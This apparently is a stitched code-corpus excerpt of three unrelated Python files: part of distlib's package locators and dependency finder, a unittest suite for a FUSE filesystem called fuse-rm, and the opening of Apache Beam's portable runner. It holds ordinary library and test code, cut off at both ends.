href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.daemon = True
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
test.py
|
import unittest
import glob
import json
import os
import shutil
import time
from datetime import datetime
from threading import Thread
from subprocess import Popen, PIPE, check_output
from pathlib import Path
ROOT = Path(__file__).parent
SRC_DIR = ROOT / 'source'
TARGET_DIR = ROOT / 'target'
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._fuserm = Popen(['cargo', 'run', '--', SRC_DIR, TARGET_DIR],
stdout=PIPE)
cls._fuserm_output = []
while True:
line = cls._fuserm.stdout.readline()
if line.startswith(b'Waiting for Ctrl-C'):
break
elif cls._fuserm.poll is not None:
raise RuntimeError('fuse-rm failed to start')
else:
print(line)
cls._fuserm_thread = Thread(target=cls.capture_fuserm_output)
cls._fuserm_thread.start()
os.chdir(TARGET_DIR)
@classmethod
def capture_fuserm_output(cls):
while True:
if cls._fuserm.poll() is not None:
break
cls._fuserm_output.append(cls._fuserm.stdout.readline())
#print(cls._fuserm_output[-1])
@classmethod
def tearDownClass(cls):
cls._fuserm.terminate()
def test_file_structure_root(self):
root = set(check_output('stat -c "%s %n" *', shell=True).decode().split('\n'))
self.assertSetEqual(root, { '',
'0 dolor',
'0 trash',
'126501 ipsum.pdf',
'4091 lorem.epub' })
def test_file_structure_subdir(self):
dir = set(check_output(['stat -c "%s %n" dolor/*'], shell=True).decode().split('\n'))
self.assertSetEqual(dir, { '',
'30875 dolor/ipsum.epub',
'28859 dolor/lorem.pdf' })
def test_rename(self):
test_file = Path('ipsum.pdf')
test_file_sz = test_file.stat().st_size
new_file = test_file.rename(Path('dolor') / test_file.name)
self.assertEqual(test_file_sz, new_file.stat().st_size)
self.assertFalse(test_file.exists())
new_file.rename(test_file)
self.assertEqual(test_file_sz, test_file.stat().st_size)
def test_mkdir(self):
test_dir = Path('test_dir')
test_dir.mkdir()
self.assertTrue(test_dir.exists())
test_dir_2 = test_dir / 't1'
test_dir_2.mkdir()
self.assertRaisesRegex(OSError, 'not empty', test_dir.rmdir)
test_dir_2.rmdir()
test_dir.rmdir()
def test_add_epub(self):
test_file = Path('ipsum.epub')
self.assertFalse(test_file.exists())
shutil.copyfile(Path('..') / test_file, test_file)
self.test_file_structure_subdir()
self.assertTrue(test_file.exists())
test_file.unlink()
self.assertFalse(test_file.exists())
def test_add_pdf_subdir(self):
test_file = Path('dolor/ipsum.pdf')
src_file = Path('..') / test_file.name
self.assertFalse(test_file.exists())
shutil.copyfile(src_file, test_file)
self.test_file_structure_root()
self.assertEqual(test_file.stat().st_size, src_file.stat().st_size)
test_file.unlink()
self.assertFalse(test_file.exists())
def test_add_unsupported(self):
test_file = Path('../lorem.txt')
self.assertRaisesRegex(OSError, 'not implemented',
lambda: shutil.copyfile(test_file, test_file.name))
def test_rm_recursive(self):
test_dir = Path('test-dir/deeper/')
test_dir.mkdir(parents=True, exist_ok=True)
self.assertTrue(test_dir.exists())
shutil.copyfile('../lorem.epub', test_dir / 'a')
shutil.copyfile('../lorem.pdf', test_dir / 'b')
shutil.rmtree(test_dir.parent)
self.assertFalse(test_dir.exists())
def test_dir_with_dot(self):
# make KOReader's side cars go away
test_dir = Path('test-dir.sdr')
self.assertRaisesRegex(OSError, 'not implemented',
test_dir.mkdir)
# TODO: file moved to trash -> file exists error
def test_last_modified(self):
curtime = datetime.now()
test_file = Path('ipsum.epub')
self.assertFalse(test_file.exists())
shutil.copyfile(Path('..') / test_file, test_file)
newest = max(glob.iglob(str(SRC_DIR) + '/*.metadata'),
key=os.path.getctime)
print(newest)
with open(newest) as f:
metadata = json.load(f)
self.assertTrue(isinstance(metadata['lastModified'], str))
modtime = datetime.fromtimestamp(int(metadata['lastModified']) // 1000)
self.assertTrue((modtime - curtime).total_seconds() < 1)
test_file.unlink()
self.assertFalse(test_file.exists())
def test_trash(self):
dir = set(check_output(['stat -c "%s %n" trash/*'], shell=True).decode().split('\n'))
self.assertSetEqual(dir, { '',
'28859 trash/lorem-trashed.pdf' })
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
